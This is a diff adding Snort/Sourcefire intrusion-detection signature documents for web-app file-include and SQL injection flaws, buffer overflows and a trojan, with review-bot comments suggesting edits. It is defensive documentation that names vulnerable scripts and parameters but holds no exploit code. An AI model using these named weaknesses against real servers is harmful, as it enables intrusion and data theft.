+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
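Review bot: same wording issues as 100000402.txt: "running ona web server" should be "running on a web server", "attackers choosing" should be "attacker's choosing", and "may indicate that an exploitation attempt has been attempted" is circular. The script "admin_words.php" and parameter "phpbb_root_path" are phpBB names while the application is given as "phpNuke"; if the affected component is a forum module bundled with phpNuke, saying so in Detailed Information would help readers locate the script on their installation.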
--- /dev/null
+++ b/doc/signatures/100000818.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000818
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Graffiti Forums" application running on a webserver. Access to the file "topics.php" with SQL commands being passed as the "f" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "f" parameter in the "topics.php" script used by the "Graffiti Forums" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Graffiti Forums
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
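Review bot: the "--" separators after the Sid value, after Affected Systems and after Contributors are missing the blank line that precedes them in every other file. The second Detailed Information paragraph is a comma splice ("...compromise the database backend for the application, the attacker may also be able to execute..."); split it into two sentences. "running ona web server" should be "running on a web server" and "attackers choosing" should be "attacker's choosing". The third paragraph about credential validation is unrelated to SQL injection and could be dropped. Corrective Action only says to patch; for an SQL injection signature it is worth adding that the "f" parameter should be validated server-side and passed to the database through parameterised queries, which is the defence the cited reference covers.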
--- /dev/null
+++ b/doc/signatures/1151.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1151
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
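Review bot: the documentation names no vulnerability, file or parameter, so a reader cannot tell what this Sid actually matches or judge the "None known." False Positives claim; a sentence naming the URI or pattern the rule looks for would fix that. "Web server" and "web server" are capitalised inconsistently within Detailed Information, "attackers choosing" should be "attacker's choosing", and several wrapped lines carry trailing whitespace.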
--- /dev/null
+++ b/doc/signatures/859.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+859
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
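Review bot: "running ona web server" in Detailed Information should be "running on a web server", and "attackers choosing" should be "attacker's choosing". The line "relationships between the victim server and other hosts can be exploited by the attacker." exceeds the wrap width used by the rest of the file and should be rewrapped. As with 1151.txt, no CGI script or parameter is named, so consider stating what the rule matches.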
--- /dev/null
+++ b/doc/signatures/287.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+287
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+QUALCOMM Qpopper POP3 buffer overflow vulnerability in BSD operating 
+systems.
+
+--
+Impact:
+Remote execution of arbitrary code leading to remote root compromise.
+
+--
+Detailed Information:
+An exploit is available that takes advantage of a buffer overflow 
+vulnerability in QUALCOMM Qpopper POP3 mail server version 2.53 or 
+earlier. This exploit can be used to obtain root access to the 
+compromised server.
+
+--
+Affected Systems:
+BSD distributions that ship QUALCOMM Qpopper POP3 server version 2.53 or
+earlier.
+
+--
+Attack Scenarios:
+An attacker executes exploit code against a vulnerable server and 
+obtains root privileges on the compromised computer.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of QUALCOMM Qpopper appropriate for your 
+BSD distribution.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-1998-08.html
+
+--
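Review bot: the Summary scopes the issue to "BSD operating systems" and Affected Systems to "BSD distributions", while Detailed Information describes the overflow as being in Qpopper 2.53 or earlier with no platform qualifier. If the bug is in Qpopper itself, Affected Systems should list any system running Qpopper 2.53 or earlier; if only BSD builds are affected, say why. Several wrapped lines carry trailing whitespace.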
--- /dev/null
+++ b/doc/signatures/2564.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2564
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the Symantec Firewall.
+
+--
+Impact:
+A successful attack may cause a buffer overflow, permitting the execution
+of arbitrary code on the vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability in the way the Symantec Firewall handles NetBIOS
+Name Service response packets.  If an attacker crafts a malicious UDP NetBIOS
+Name Service unsolicited response to a vulnerable Symantec Firewall that does
+not block port 137, it is possible to cause a buffer overflow and execute
+abitrary code with kernel privileges.  The vulnerability exists because of
+improper validation of the length field value for the NetBIOS name returned.
+The default configuration does not allow UDP port 137 traffic and should
+not be exploitable if UDP port 137 is blocked.
+
+--
+Affected Systems:
+Symantec Norton Internet Security and Professional 2002,2003,2004
+Symantec Norton Personal Firewall 2002,2003,2004
+Symantec Norton AntiSpam 2004
+Symantec Client Firewall 5.01, 5.1.1
+Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
+
+--
+Attack Scenarios:
+An attacker can craft a malicious UDP NetBIOS Name Service response,
+possibly causing a buffer overflow and the subsequent execution of
+arbitrary code with kernel privileges on an exploitable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0444
+
+Bugtraq:
+http://www.securityfocus.com/bid/10333
+
+Misc:
+http://www.eeye.com/html/Research/Advisories/AD20040512A.html
+
+--
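Review bot: "abitrary code" in Detailed Information should be "arbitrary code"; the "Additional References" header is missing the trailing colon used in every other file; and "2002,2003,2004" in Affected Systems needs spaces after the commas. Detailed Information states that the default configuration blocks UDP port 137 and the bug should not be exploitable when it is blocked, but Corrective Action only says to upgrade; adding "confirm UDP port 137 is blocked" as an interim mitigation follows directly from that sentence and is what an operator who cannot upgrade immediately needs.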
--- /dev/null
+++ b/doc/signatures/100000398.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000398
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "frchart.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "frchart.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
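Review bot: same issues as 100000402.txt: "running ona web server" should be "running on a web server", "attackers choosing" should be "attacker's choosing", the Summary's "has been attempted" is circular, and the file has two leading and one trailing blank line. Since this Sid and 100000402 both cover the "babInstallPath" parameter in Ovidentia (here in "frchart.php", there in "event.php"), a cross-reference between the two files would help an analyst who sees both fire on the same host.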
--- /dev/null
+++ b/doc/signatures/100000599.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000599
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_edit.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
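Review bot: the "--" separators after the Sid value, after Affected Systems and after Contributors are missing the blank line that precedes them in the rest of the files. "running ona web server" should be "running on a web server", "attackers choosing" should be "attacker's choosing", and "may indicate that an exploitation attempt has been attempted" is circular. Nearly every wrapped line ends in trailing whitespace.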
--- /dev/null
+++ b/doc/signatures/208.txt
@@ -0,0 +1,89 @@
+Rule:
+
+--
+Sid:
+208
+
+--
+Summary:
+Phase0 is a Trojan Horse offering the attacker control of the victim 
+host. This event is generated when the victim server replies to an 
+attackers client connection request.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+
+The Trojan changes system registry settings to add the PhaseZero server
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+The default name of the server application is MsgServ.
+
+Server Port: 555 although this can be changed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added:
+
+	MsgServ
+
+Delete the server program msgsvr32.exe and/or ServerS.exe.
+
+A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Dark-e
+http://www.dark-e.com/archive/trojans/phase/
+
+--
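Review bot: this file has no "Affected Systems:" section; the operating-system list (Windows 95 through Windows 2000) sits under Detailed Information instead. Move it into an Affected Systems section between Detailed Information and Attack Scenarios so the file follows the same layout as the others. In Summary, "attackers client" should be "attacker's client". Under Corrective Action, "Registry keys added: MsgServ" names a value under the listed Run key rather than a key of its own; "Registry value added under the key above: MsgServ" is accurate and tells the administrator where to look. Ease of Attack is a comma splice; "This is Trojan activity; the target machine may already be compromised." reads correctly. There is also a stray blank line directly after the Corrective Action header.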
--- /dev/null
+++ b/doc/signatures/3240.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3240
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
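Review bot: this file is identical to 3262.txt apart from the Sid, including the "Expoit" typo in Ease of Attack and the Attack Scenarios text about an overly long filename over a network share that contradicts the malformed RPC request described in Detailed Information. Fix both, and if the two rules detect different things (different ports or RPC interfaces), say what distinguishes them; otherwise a reader cannot tell why two Sids exist.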
--- /dev/null
+++ b/doc/signatures/1525.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1525
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
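Review bot: duplicate of 1151.txt apart from the Sid, with the same "Web server"/"web server" inconsistency and "attackers choosing" typo, and the same problem that nothing in the text says what the rule matches. Add the URI or pattern this rule looks for, and what distinguishes it from 1151.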
--- /dev/null
+++ b/doc/signatures/1861.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1861
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
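Review bot: the Affected Systems section is empty. Given the Summary ("a web server or an application running on that server"), fill it with "All systems running a web server." or with the specific application the rule targets. "running ona web server" in Detailed Information should be "running on a web server". The Corrective Action to disallow administrative access from outside the protected network is a concrete mitigation that fits this rule well and should stay.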
--- /dev/null
+++ b/doc/signatures/1996.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1996
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
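Review bot: typo in the Detailed Information section of 1996.txt, "running ona web server" should read "running on a web server". More importantly, nothing in this file identifies which CGI application or vulnerability sid 1996 covers: the Summary says only "a known vulnerability in a CGI web application", the Detailed Information is generic, and Additional References is empty. Please name the affected application and add a reference; as written an analyst triaging this event has nothing to act on.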
--- /dev/null
+++ b/doc/signatures/1165.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1165
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
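Review bot: 1165.txt never says which web server or application sid 1165 targets; the Summary, Detailed Information and Attack Scenarios sections are all generic ("attack scenarios are legion") and Additional References is empty. Please add the product, the specific vulnerability and a reference. Several lines also carry trailing whitespace (the first Summary line, the second Impact line and the "Many known vulnerabilities exist" line).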
--- /dev/null
+++ b/doc/signatures/1608.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1608
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
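Review bot: 1608.txt is word-for-word identical to 1996.txt apart from the Sid value, including the "running ona web server" typo in Detailed Information. If the two sids cover different CGI applications, the Summary and Detailed Information of each need to say which one, and Additional References should cite it; as written the documentation cannot distinguish the two events. Please also fix "ona" to "on a".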
--- /dev/null
+++ b/doc/signatures/2135.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2135
+
+--
+Summary:
+This event is generated when a remote user attempts to access philboard.mdb on a web server port on an internal server. This may indicate an attempt to exploit a vulnerability in the default installation of Philboard bulletin board software, where the Philboard Access database is accessible to the Internet.
+
+--
+Impact:
+Information gathering, possible administrative access to the bulletin board.
+
+--
+Detailed Information:
+By default, Philboard installs the Access database file to database/philboard.mdb on the web server. Without authentication, an attacker can download this file to access Philboard bulletin board user names, passwords, and message archives.
+
+--
+Affected Systems:
+Any server running Philboard 1.x.
+
+--
+Attack Scenarios:
+An attacker can download the Philboard database, which will allow them to access Philboard user names, passwords, and message archives.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Move philboard.mdb to an inaccessible location and/or add security permissions to the directory in which it resides.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Secunia
+http://www.secunia.com/advisories/8898/
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000397.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000397
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "login.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "login.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
